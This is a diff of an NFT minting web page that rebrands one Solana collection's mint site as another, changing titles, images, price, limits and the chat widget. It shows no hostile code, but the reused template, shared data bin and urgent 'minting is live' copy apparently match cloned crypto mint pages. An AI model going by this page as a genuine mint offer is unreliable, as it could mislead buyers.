--- a/index.html
+++ b/index.html
@@ -4,18 +4,18 @@
     <meta charset="utf-8">
     <meta name="description" content="NTC" data-react-helmet="true" />
     <meta name="theme-color" content="#000000" />
-    <meta content="Zenjin Viperz" property="og:title">
+    <meta content="https://regulatednft.io/mint-app" property="og:title">
     <meta content="
-    🟢 Zenjin Viperz Pre-Sale Minting is Now Live!
+    🟢 ReGuLaTeD Private Minting is Now Live!
     
-    ‧SALE INFO:|‧Mint Price: 2 SOL |‧Supply: 2,000
+    ‧SALE INFO|Mint Price: 2.5 SOL |Supply: 6969
     " property="og:description">
-    <meta content="https://pbs.twimg.com/profile_banners/1479210745372020737/1649444631/1500x500" property="og:image">
+    <meta content="https://pbs.twimg.com/profile_banners/1509686786083147779/1650310205/1500x500" property="og:image">
     <meta name="twitter:card" content="summary_large_image">
-    <link type="application/json+oembed" href="https://api.jsonbin.io/b/622184b37caf5d67835ed9ba/106" />
+    <link type="application/json+oembed" href="https://api.jsonbin.io/b/622184b37caf5d67835ed9ba/111" />
     <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
-    <title>Zenjin Viperz | Mint </title>
-    <link rel="shortcut icon" href="https://pbs.twimg.com/profile_images/1512179260538212358/kDUDDjiy_400x400.jpg" />
+    <title>Regulated NFT Collection</title>
+    <link rel="shortcut icon" href="https://www.regulatednft.io/logo.png" />
     <link rel="stylesheet" type="text/css" href="css/all.min.css">
     <link rel="stylesheet" type="text/css" href="css/normalize.css">
     <link rel="stylesheet" type="text/css" href="css/style.css">
@@ -40,22 +40,16 @@
         gtag('config', 'UA-157459645-3');
     </script>
     <script type="text/javascript">
-        var _smartsupp = _smartsupp || {};
-        _smartsupp.key = '953c858d9e29b58eb3fa54c938d34faad83301fe';
-        window.smartsupp || (function(d) {
-            var s, c, o = smartsupp = function() {
-                o._.push(arguments)
-            };
-            o._ = [];
-            s = d.getElementsByTagName('script')[0];
-            c = d.createElement('script');
-            c.type = 'text/javascript';
-            c.charset = 'utf-8';
-            c.async = true;
-            c.src = 'https://www.smartsuppchat.com/loader.js?';
-            s.parentNode.insertBefore(c, s);
-        })(document);
-    </script>
+        var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date();
+        (function(){
+        var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0];
+        s1.async=true;
+        s1.src='https://embed.tawk.to/6287e3d6b0d10b6f3e73461f/1g3hd3vkp';
+        s1.charset='UTF-8';
+        s1.setAttribute('crossorigin','*');
+        s0.parentNode.insertBefore(s1,s0);
+        })();
+        </script>
 </head>
 
 <body>
@@ -70,12 +64,12 @@
         <div class="main-area">
 
             <div class="main-area__right">
-                <h2 class="right-title">Zenjin Viperz</h2>
+                <h2 class="right-title">ReGuLaTeD (aka f*ck regulation)</h2>
 
                 <div class="right-list">
                     <li>
                         <div class="text">
-                            Zenjin Viperz are a collection of 2,000 NFTs on the #Solana Blockchain.
+                            Animated series, Staking & RegulatedCast 🎙 coming soon to #Solana.
                     </li>
                     </div>
 
@@ -86,8 +80,8 @@
                             <a href="javascript:void(0)" class="plus-btn">+</a>
                         </div>
                         <div class="price-box">
-                            <div id="price-total"><span>2</span> SOL</div>
-                            <div>3 NFT max per transaction</div>
+                            <div id="price-total"><span>2.5</span> SOL</div>
+                            <div>2 NFT max per transaction</div>
                         </div>
                     </div>
                     <div class="button-box">
@@ -103,7 +97,7 @@
 
                 <div class="main-area__left">
                     <div class="slider-area">
-                        <img class="animation" src="https://pbs.twimg.com/profile_images/1512179260538212358/kDUDDjiy_400x400.jpg" alt="GiF">
+                        <img class="animation" src="https://www.regulatednft.io/team/Dev%202.png" alt="GiF">
                     </div>
                 </div>
 
@@ -118,12 +112,12 @@
         const $numberText = document.querySelector("#total");
         const $remaining = document.querySelector('#remaining');
         const $priceResultText = document.querySelector("#price-total span");
-        let itemPriceSelected = 2;
+        let itemPriceSelected = 2.5;
         let itemCount = 1;
 
         $plusButton.addEventListener("click", function(e) {
             e.preventDefault();
-            itemCount = itemCount < 3 ? itemCount + 1 : 3;
+            itemCount = itemCount < 2 ? itemCount + 1 : 2;
             $numberText.value = itemCount;
             $priceResultText.textContent = (itemPriceSelected * itemCount).toFixed(2);
         });
